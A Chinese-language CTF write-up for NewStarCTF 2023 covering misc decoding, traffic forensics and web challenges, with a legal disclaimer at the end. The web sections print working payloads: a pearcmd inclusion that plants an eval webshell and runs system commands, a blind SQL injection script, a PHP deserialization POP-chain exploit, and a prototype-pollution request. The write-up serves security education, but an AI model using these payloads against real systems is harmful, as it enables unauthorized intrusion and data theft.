目錄

一、陽光開朗大男孩

二、大怨種

三、2-分析

四、鍵盤俠

五、滴滴滴

六、Include?

七、medium_sql

八、POP Gadget

九、OtenkiGirl

---

一、陽光開朗大男孩

1.題目給出了secret.txt和flag.txt兩個文件，secret.txt內(nèi)容如下：

法治自由公正愛國公正敬業(yè)法治和諧平等友善敬業(yè)法治富強(qiáng)公正民主法治和諧法治和諧法治法治公正友善敬業(yè)法治文明公正自由平等誠信平等公正敬業(yè)法治和諧平等友善敬業(yè)法治和諧和諧富強(qiáng)和諧富強(qiáng)和諧富強(qiáng)平等友善敬業(yè)公正愛國和諧自由法治文明公正自由平等友善敬業(yè)法治富強(qiáng)和諧自由法治和諧法治和諧法治和諧法治法治和諧富強(qiáng)法治文明公正自由公正自由公正自由公正自由

在?http://www.atoolbox.net/Tool.php?Id=850?進(jìn)行社會主義核心價值觀解密后可以得到：

this_password_is_s000_h4rd_p4sssw0rdddd

得到一個Key，結(jié)合flag.txt中的emoji表情可以推斷出flag.txt使用了emoji-AES加密。
?

在?https://aghorler.github.io/emoji-aes/?進(jìn)行emoji-AES解密，key為s000_h4rd_p4sssw0rdddd，得到Flag：

二、大怨種

1.題目給出gif圖片，編寫一個腳本提取出gif的每一幀圖片：

from PIL import Image
import osdef extract_frames(gif_path, output_dir):    gif = Image.open(gif_path)    os.makedirs(output_dir, exist_ok=True)    try:        while True:            current_frame = gif.tell()            output_path = os.path.join(output_dir, f"frame_{current_frame}.png")                                         gif.save(output_path, "PNG")            gif.seek(current_frame + 1)    except EOFError:        pass    print("提取完成！")gif_path = "1.gif"
output_dir = "./res/"
extract_frames(gif_path, output_dir)

其中有一幀圖像是這樣的：
?

是漢信碼，可以在?https://tuzim.net/hxdecode/?在線掃描，掃描后得到Flag：

三、2-分析

題目描述如下：
?

1.Flag由三個信息構(gòu)成：登錄用戶名、存在漏洞的文件名、寫入的WebShell文件名。
根據(jù)我們的常識，一般登錄請求都是POST方式的請求，因此可以先過濾出所有的POST請求：

http && http.request.method == POST

可以看到有一個發(fā)送給/api/action/login.php的POST請求中有username和password字段：
?

由此推斷出登錄的用戶名為best_admin。
2.其次是存在漏洞的文件名和WebShell文件名，可以看到有大量的目錄掃描流量，先使用WireShark過濾器過濾掉響應(yīng)狀態(tài)碼為404的響應(yīng)：

http && http.response.code != 404

對剩下的流量進(jìn)行分析，關(guān)注到1267號流量響應(yīng)比較奇怪：
?

很明顯存在WebShell，追蹤該流。
?

由此可以得到剩下的兩個信息，index.php文件的page參數(shù)存在任意文件包含漏洞，攻擊者通過這個漏洞包含pearcmd.php向服務(wù)器中寫入了名為wh1t3g0d.php的WebShell。
而后續(xù)的流量也可以看到攻擊者是利用wh1t3g0d.php這個Shell執(zhí)行了一些系統(tǒng)命令：
?

由此得到Flag明文：best_admin_index.php_wh1t3g0d.php
整體md5后包裹flag{}得到最終flag：flag{4069afd7089f7363198d899385ad688b}

四、鍵盤俠

1.打開題目發(fā)現(xiàn)是USB流量，結(jié)合題目名猜測是鍵盤流量，使用WireShark過濾器過濾出所有的鍵盤流量，然后導(dǎo)出保存為res.pcapng：

usb.src =="1.15.1"

使用tshark命令對流量數(shù)據(jù)進(jìn)行提取并去除空行：

tshark -r res.pcapng -T fields -e usb.capdata | sed '/^\s*$/d' > usbdata.txt

導(dǎo)出后使用以下腳本進(jìn)行按鍵信息提取：

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}
nums = []
keys = open('usbdata.txt')
for line in keys:if len(line)!=17:continuenums.append(line[0:2]+line[4:6])
keys.close()
output = ""
for n in nums:if n[2:4] == "00" :continueif n[2:4] in normalKeys:if n[0:2]=="02":output += shiftKeys [n[2:4]]else :output += normalKeys [n[2:4]]else:output += '[unknown]'
print('output :n' + output)

得到如下結(jié)果：

nw3lc0m3<SPACE>to<SPACE>newstar<SPACE>ctf<SPACE>2023<SPACE>flag<SPACE>is<SPACE>here<SPACE>vvvvbaaaasffjjwwwwrrissgggjjaaasdddduuwwwwwwwwiiihhddddddgggjjjjjaa1112333888888<ESC><ESC>2hhxgbffffbbbnnat<CAP><CAP>ff<DEL>lll<DEL><DEL>aaa<DEL><DEL>gggg<DEL><DEL><DEL>{999<DEL><DEL>999<DEL><DEL>11<DEL>9aaa<DEL><DEL><SPACE><SPACE><DEL><DEL>eb2---<DEL><DEL>a450---<DEL><DEL>2f5f<SPACE><SPACE><SPACE><DEL><DEL><DEL>--<DEL>7bfc[unknown][unknown][unknown]-8989<DEL><DEL>dfdf<DEL><DEL>4bfa4bfa<DEL><DEL><DEL><DEL>85848584}}}<DEL><DEL><DEL><DEL><DEL><DEL><DEL>}]<SPACE><SPACE><SPACE><SPACE>nice<SPACE>work!1yyoou<SPACE>ggot<SPACE>tthhis<SPACE>fllag

\<DEL\>表示刪除，\<SPACE\>表示空格，根據(jù)這個按鍵順序?qū)?shù)據(jù)進(jìn)行處理后得到flag：

flag{9919aeb2-a450-2f5f-7bfc-89df4bfa8584}

五、滴滴滴

1.題目給出一個wav文件和一個jpg文件，其中wav文件聽起來像是撥號音，利用dtmf2num工具進(jìn)行撥號音識別：
?

得到撥號音的內(nèi)容為：

52563319066

結(jié)合題目簡介的提示，這串?dāng)?shù)字應(yīng)該是某處使用的密碼，因此可以嘗試steghide工具來對jpg圖片進(jìn)行隱寫內(nèi)容提取：
?

得到一個txt文件，打開即是Flag：

六、Include?

1.頁面源代碼如下。

<?phperror_reporting(0);if(isset($_GET['file'])) {$file = $_GET['file'];if(preg_match('/flag|log|session|filter|input|data/i', $file)) {die('hacker!');}include($file.".php");# Something in phpinfo.php!}else {highlight_file(__FILE__);}
?>

題目過濾了常見的偽協(xié)議和日志文件，提示 Something in phpinfo.php!，所以先去訪問phpinfo.php，payload如下：

?file=phpinfo

查找flag，發(fā)現(xiàn)fake{Check_register_argc_argv}。
?

查找register_argc_argv，發(fā)現(xiàn)為on。
?

結(jié)合標(biāo)題?（pear），提示以及register_argc_argv為on，知道是要利用pearcmd文件包含達(dá)成rce。
payload：

?+config-create+/&file=/usr/local/lib/php/pearcmd&/<?=@eval($_REQUEST[8]);?>+/tmp/cmd.php

然后訪問包含一句話木馬的cmd.php文件，執(zhí)行遠(yuǎn)程命令。

?file=/tmp/cmd&8=system("ls+/");

?file=/tmp/cmd&8=system("cat+/flag");

七、medium_sql

1.根據(jù)題目可以判斷是sql注入，先按照常規(guī)的測試方法，判斷出是個布爾盲注。

?id=TMP0919' And if(1>0,1,0) --+
?id=TMP0919' And if(0>1,1,0) --+

?

發(fā)第一個，有回顯，第二個，沒回顯，說明頁面可以根據(jù)if判斷的結(jié)果回顯兩種（真假）內(nèi)容，因此是布爾盲注。
2.編寫盲注腳本，用二分查找。

import requests
import timedef condition(res):if 'Physics' in res.text:return Truereturn Falseresult = ''
_url = 'xxxxx'
for _time in range(1, 1000):print("time:%d" % _time)left = 32right = 128while right > left:mid = (left + right) // 2# 獲取當(dāng)前庫表名# url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))In({mid})),1,0)%23"# 獲取字段名# url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In ('here_is_flag'))) fRom {_time} FOr 1))))In({mid})),1,0)%23"# 獲取字段值url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))In({mid})),1,0)%23"# 防止請求速率過快time.sleep(0.2)res = requests.get(url=url)if condition(res):result += chr(mid)print(result)breakelse:# 獲取當(dāng)前庫表名# url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(table_name))fRom(infOrmation_schema.tables)whEre((tAble_schema) In (dAtabase()))) fRom {_time} FOr 1))))>({mid})),1,0)%23"# 獲取字段名# url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(grouP_cOncat(column_name))fRom(infOrmation_schema.columns)whEre((tAble_name) In ('here_is_flag'))) fRom {_time} FOr 1))))>({mid})),1,0)%23"# 獲取字段值url = f"{_url}?id=TMP0919' And if((((Ord(sUbstr((Select(flag)fRom(here_is_flag)) fRom {_time} FOr 1))))>({mid})),1,0)%23"res = requests.get(url=url)if (condition(res)):left = midelse:right = mid

八、POP Gadget

1.源代碼如下。

<?php
highlight_file(__FILE__);class Begin{public $name;public function __destruct(){if(preg_match("/[a-zA-Z0-9]/",$this->name)){echo "Hello";}else{echo "Welcome to NewStarCTF 2023!";}}
}
class Then{private $func;public function __toString(){($this->func)();return "Good Job!";}
}
class Handle{protected $obj;public function __call($func, $vars){$this->obj->end();}
}
class Super{protected $obj;public function __invoke(){$this->obj->getStr();}public function end(){die("==GAME OVER==");}
}
class CTF{public $handle;public function end(){unset($this->handle->log);}
}
class WhiteGod{public $func;public $var;public function __unset($var){($this->func)($this->var);    }
}
@unserialize($_POST['pop']);

2.題目主要考察POP鏈構(gòu)造，整個鏈子比較簡單。從Begin的__destruct析構(gòu)函數(shù)作為起點開始，構(gòu)造POP鏈觸發(fā)到WhiteGod的__unset方法，__unset方法中存在一個函數(shù)的動態(tài)調(diào)用，可以實現(xiàn)RCE。
POP Gadget如下：

Begin::__destruct -> Then::__toString -> Super::__invoke -> Handle::__call -> CTF::end -> WhiteGod::__unset

編寫Exp如下：

<?php
class Begin {public $name;public function __construct($a) {$this->name = $a;}
}
class Then {private $func;public function __construct($a) {$this->func= $a;}
}
class Handle {protected $obj;public function __construct($a) {$this->obj = $a;}
}
class Super {protected $obj;public function __construct($a) {$this->obj = $a;}
}
class CTF {public $handle;public function __construct($a) {$this->handle = $a;}
}
class WhiteGod {public $func;public $var;public function __construct($a, $b) {$this->func = $a;$this->var = $b;}
}
// POP Gadget: 
// Begin::__destruct -> Then::toString -> Super::__invoke -> Handle::__call -> CTF::end -> WhiteGod::__unset
$obj = new Begin(new Then(new Super(new Handle(new CTF(new WhiteGod("readfile","/flag"))))));
echo urlencode(serialize($obj));

需要注意的是一些類中有保護(hù)或私有屬性的成員，因此需要對序列化數(shù)據(jù)進(jìn)行URL編碼，得到：

O%3A5%3A%22Begin%22%3A1%3A%7Bs%3A4%3A%22name%22%3BO%3A4%3A%22Then%22%3A1%3A%7Bs%3A10%3A%22%00Then%00func%22%3BO%3A5%3A%22Super%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00obj%22%3BO%3A6%3A%22Handle%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00obj%22%3BO%3A3%3A%22CTF%22%3A1%3A%7Bs%3A6%3A%22handle%22%3BO%3A8%3A%22WhiteGod%22%3A2%3A%7Bs%3A4%3A%22func%22%3Bs%3A8%3A%22readfile%22%3Bs%3A3%3A%22var%22%3Bs%3A5%3A%22%2Fflag%22%3B%7D%7D%7D%7D%7D%7D

九、OtenkiGirl

1.隨便提交一些信息，通過抓包或者直接查看附件的源碼都能發(fā)現(xiàn)下面兩個請求地址：
第一個：獲取全部信息（可以改變0的值就是獲取到指定時間戳之后的信息）
?

?

第二個：提交信息
?

提交信息必須為 JSON 格式contact和reason字段是必須的，例如

POST /submit HTTP/1.1
Content-Type: application/json{  "contact": "test",  "reason": "test"}

查看routes/info.js源碼，考察從數(shù)據(jù)庫中獲取數(shù)據(jù)的函數(shù)getInfo
?

其中第4行和第5行將我們傳入的timestamp做了一個過濾，使得所返回的數(shù)據(jù)不早于配置文件中的min_public_time
查看根目錄下的config.js和config.default.js后發(fā)現(xiàn)config.js并沒有配置min_public_time，因此getInfo的第5行只是采用了DEFAULT_CONFIG.min_public_time
考慮原型鏈污染污染min_public_time為我們想要的日期，就能繞過最早時間限制，獲取任意時間的數(shù)據(jù)
查看routes/submit.js源碼，發(fā)現(xiàn)注入點
?

其中merge函數(shù)第7行存在原型鏈污染，因此只要考慮注入data['__proto__']['min_public_time']的值即可
于是構(gòu)造payload

POST /submit HTTP/1.1
Content-Type: application/json{  "contact": "test",  "reason": "test",  "__proto__": {    "min_public_time": "1001-01-01"  }}

然后為我們再請求/info/0，就能得到更多的數(shù)據(jù)，得到flag。

申明：本公眾號所分享內(nèi)容僅用于網(wǎng)絡(luò)安全技術(shù)討論，切勿用于違法途徑，

所有滲透都需獲取授權(quán)，違者后果自行承擔(dān)，與本號及作者無關(guān)，請謹(jǐn)記守法.

沒看夠~？歡迎關(guān)注！